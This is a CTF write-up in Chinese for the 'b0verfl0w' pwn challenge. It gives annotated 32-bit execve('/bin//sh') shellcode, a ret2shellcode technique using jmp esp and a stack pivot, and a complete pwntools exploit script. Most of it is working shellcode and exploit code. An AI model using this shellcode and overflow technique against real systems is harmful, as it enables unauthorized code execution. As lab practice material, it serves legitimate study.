b0verfl0w

; 汇编指令
xor ecx, ecx          ; 将 ecx 寄存器清零
mul ecx               ; 将 eax 寄存器中的值与 ecx 寄存器中的值相乘，结果存放在 eax 和 edx 中，相当于 edx = eax * 0
push ecx              ; 将 ecx 寄存器中的值压入栈，此时栈顶为 0
push 0x68732f2f       ; 将字符串 "/bin//sh" 的 ASCII 码逆序压入栈
push 0x6e69622f       ; 继续将字符串 "/bin//sh" 的 ASCII 码逆序压入栈
mov ebx, esp          ; 将 esp 寄存器中的值（即字符串 "/bin//sh" 的地址）存放到 ebx 寄存器中
mov al, 0xb           ; 将 0xb 存放到 al 寄存器中，该值代表 execve 系统调用的编号
int 0x80              ; 触发系统调用，执行 execve("/bin//sh", NULL, NULL)

shellcode=b"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73"+b"\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0"+b"\x0b\xcd\x80"

ret2shellcode,但是大小不够了

sub_esp_jmp=asm("sub esp,0x28;jmp esp")

改写其他不行

返回地址执行到jmp_esp,然后esp+4，执行sub esp,0x28;jmp esp，可以跳到shellcode的地址

payload=asm(shellcode)+b'a'*(0x20-len(shellcode))+b'aaaa'+p32(jmp_esp)+sup_esp_jmp

jmp esp的操作，把栈顶设为esp,同时eip指向栈顶

exp

from pwn import*
from LibcSearcher import *
#p=remote("node5.buuoj.cn",28594)
p=process("./b0verfl0w")
context.log_level="debug"
context.arch='i386'

shellcode=b"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73"+b"\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0"+b"\x0b\xcd\x80"

print(len(shellcode))
#gdb.attach(p)
sleep(1)
jmp_esp=0x08048504
sub_esp_jmp=asm("sub esp,0x28;jmp esp")
payload=shellcode+b'a'*(0x20-len(shellcode))+b'aaaa'+p32(jmp_esp)+sub_esp_jmp
#p.sendline(payload)

p.sendline(payload)

p.interactive()